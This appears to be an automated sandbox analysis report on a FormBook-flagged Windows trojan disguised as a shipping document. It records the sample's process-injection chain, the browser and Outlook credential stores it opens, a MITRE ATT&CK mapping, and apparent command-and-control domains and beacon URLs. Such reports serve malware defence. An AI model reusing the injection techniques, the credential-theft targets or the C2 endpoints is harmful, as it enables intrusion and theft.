            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtQueryVolumeInformationFile: Direct from: 0x779E2E4CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtDeviceIoControlFile: Direct from: 0x779E2A0CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtQueryAttributesFile: Direct from: 0x779E2D8CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtSetInformationThread: Direct from: 0x779E2A6CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtCreateKey: Direct from: 0x779E2B8CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtClose: Direct from: 0x779E2A8C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtProtectVirtualMemory: Direct from: 0x779E2EBCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtCreateUserProcess: Direct from: 0x779E363CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtQueryInformationProcess: Direct from: 0x779E2B46Jump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtResumeThread: Direct from: 0x779E2EDCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtWriteVirtualMemory: Direct from: 0x779E482CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtOpenKeyEx: Direct from: 0x779E2ABCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtAllocateVirtualMemory: Direct from: 0x779E480CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtDelayExecution: Direct from: 0x779E2CFCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtQuerySystemInformation: Direct from: 0x779E47ECJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtReadFile: Direct from: 0x779E29FCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtQuerySystemInformation: Direct from: 0x779E2D1CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtAllocateVirtualMemory: Direct from: 0x779E2B1CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtResumeThread: Direct from: 0x779E35CCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtMapViewOfSection: Direct from: 0x779E2C3CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtWriteVirtualMemory: Direct from: 0x779E2D5CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtProtectVirtualMemory: Direct from: 0x779D7A4EJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtSetInformationProcess: Direct from: 0x779E2B7CJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtAllocateVirtualMemory: Direct from: 0x779E3BBCJump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeNtReadVirtualMemory: Direct from: 0x779E2DACJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread register set: target process: 1088Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\RpcPing.exeThread APC queued: target process: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 27F008Jump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00458C93 LogonUserW,0_2_00458C93
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00403B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00403B4C
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00404A35
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00464EC9 mouse_event,0_2_00464EC9
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"Jump to behavior
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exeProcess created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004581F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_004581F7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00464C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00464C03
            Source: AWB NO. 077-57676135055.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: AWB NO. 077-57676135055.exe, jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0042886B cpuid 0_2_0042886B
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_004350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004350D7
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00442230 GetUserNameW,0_2_00442230
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_0043418A GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_0043418A
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00404AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00404AFE

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\RpcPing.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\RpcPing.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: AWB NO. 077-57676135055.exeBinary or memory string: WIN_81
            Source: AWB NO. 077-57676135055.exeBinary or memory string: WIN_XP
            Source: AWB NO. 077-57676135055.exeBinary or memory string: WIN_XPe
            Source: AWB NO. 077-57676135055.exeBinary or memory string: WIN_VISTA
            Source: AWB NO. 077-57676135055.exeBinary or memory string: WIN_7
            Source: AWB NO. 077-57676135055.exeBinary or memory string: WIN_8
            Source: AWB NO. 077-57676135055.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00476596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00476596
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exeCode function: 0_2_00476A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476A5A

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		2
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		2
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets151
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials2
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467058 Sample: AWB NO. 077-57676135055.exe Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 28 www.spotluv.xyz 2->28 30 www.voupeclients.com 2->30 32 22 other IPs or domains 2->32 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 5 other signatures 2->50 10 AWB NO. 077-57676135055.exe 4 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 jFlHFdZgIYNZqR.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 RpcPing.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 jFlHFdZgIYNZqR.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.spotluv.xyz 203.161.50.127, 49799, 49800, 49801 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.6171nvuhb.rent 142.202.6.230, 49774, 49775, 49776 REPRISE-HOSTINGUS Reserved 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            AWB NO. 077-57676135055.exe100%Joe Sandbox ML
            AWB NO. 077-57676135055.exe47%ReversingLabsWin32.Trojan.Strab

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://www.schema.org/SiteNavigationElement0%Avira URL Cloudsafe
            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.170%Avira URL Cloudsafe
            https://lakemontbellevue.net0%Avira URL Cloudsafe
            https://www.monsterinsights.com/0%Avira URL Cloudsafe
            http://voupeclients.com0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/bootstrap-smartmenus.css?v0%Avira URL Cloudsafe
            https://lakemontbellevue.net/comments/feed/0%Avira URL Cloudsafe
            https://lakemontbellevue.net/#website0%Avira URL Cloudsafe
            http://www.fundraiserstuffies.com/fzbg/0%Avira URL Cloudsafe
            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?resize=150%2C0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/bootstrap.min.css?ver=6.5.0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/style.css?ver=6.5.50%Avira URL Cloudsafe
            http://www.6171nvuhb.rent/hqcp/0%Avira URL Cloudsafe
            https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            https://www.google.com0%Avira URL Cloudsafe
            http://www.6171nvuhb.rent/hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
            http://www.olhadeputat.com/ieqg/?vX=xOYzP3dXeV68t5l1tdRGSaa1OFHMEwYl9QyrCyFOBp5kwxTuFOJ28A7LPoPnjOnXE6vKLrR6BAa5LOtmMQtvuaXLo91Bunju73veWhfgD7rjWCO2fFDcACU=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
            https://www.paliinfra.com/12kg/?vX=FNzl8wnE0%Avira URL Cloudsafe
            https://lakemontbellevue.net/0%Avira URL Cloudsafe
            http://www.spotluv.xyz/pci0/0%Avira URL Cloudsafe
            http://www.voupeclients.com/ouk5/?vX=PLWVRijYnvzxBPZV68lDWez5n1m4qNxygDOUEJJl7paGkoFy8irkxF+ePmZFSckDR+ltzcYQPDsLLRino9E0Pe5jqCKxYTXxZRA6KSseMdymxDABailrF38=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
            https://lakemontbellevue.net/#organization0%Avira URL Cloudsafe
            https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/loading-icon.css?ver=6.5.50%Avira URL Cloudsafe
            http://www.musiccitysauce.com/3c1k/?vX=JBvkiC5/p5M0KduSv9nMAq1L7Ov9kIxy2ulrSw8DAMQ+oYrb/Oqt+Mz9qyL7kOgxOchk71vbEF/036GwyUgS8aFzNiZYrtFOzFZSCs3+FXjpDA1Q93DrzfE=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
            https://lakemontbellevue.net/feed/0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/wow.js?ver=6.5.50%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/plugins/bluehost-wordpress-plugin/vendor/newfold-labs/wp-modu0%Avira URL Cloudsafe
            https://lakemontbellevue.net/#/schema/logo/image/0%Avira URL Cloudsafe
            http://www.selllaptop.org/tq5r/0%Avira URL Cloudsafe
            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.png?fit=220%2C700%Avira URL Cloudsafe
            https://schema.org0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/mobile-menu.js?ver=6.5.50%Avira URL Cloudsafe
            https://lakemontbellevue.net/wp-json/0%Avira URL Cloudsafe
            http://www.selllaptop.org/tq5r/?vX=2ahlOPqFbaLRJ59RJMyuJ7IfIQg9pPTz0C4c2znY6LEO/TCdmpUdsfBsLge4LzAAnPKkz9TLh65OzxMJqcN49ZYZ04DS6e4TLs38paEuEBs4iPeVqFZufcc=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/menu.js?ver=6.5.50%Avira URL Cloudsafe
            http://www.voupeclients.com/ouk5/0%Avira URL Cloudsafe
            https://lakemontbellevue.net/?s=0%Avira URL Cloudsafe
            https://aaa.za1.jecxs.cn/123.html0%Avira URL Cloudsafe
            https://lakemontbellevue.net/privacy-policy/0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/animation/animate.js?ver=6.0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.5.50%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-includes/css/dist/block-library/style.min.css?ver=6.5.50%Avira URL Cloudsafe
            https://cdn.userway.org/widget.js0%Avira URL Cloudsafe
            https://lakemontbellevue.net/xmlrpc.php?rsd0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/owl.carousel.min.js?ver=6.50%Avira URL Cloudsafe
            http://www.musiccitysauce.com/3c1k/0%Avira URL Cloudsafe
            http://www.orthonow.live/c7lp/0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/animate.css?ver=6.5.50%Avira URL Cloudsafe
            https://support.google.com/chrome/?p=plugin_flash0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-includes/js/comment-reply.min.js?ver=6.5.50%Avira URL Cloudsafe
            https://yoast.com/wordpress/plugins/seo/0%Avira URL Cloudsafe
            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?w=512&amp;ssl0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/bootstrap.min.js?ver=6.5.50%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/main.js?ver=6.5.50%Avira URL Cloudsafe
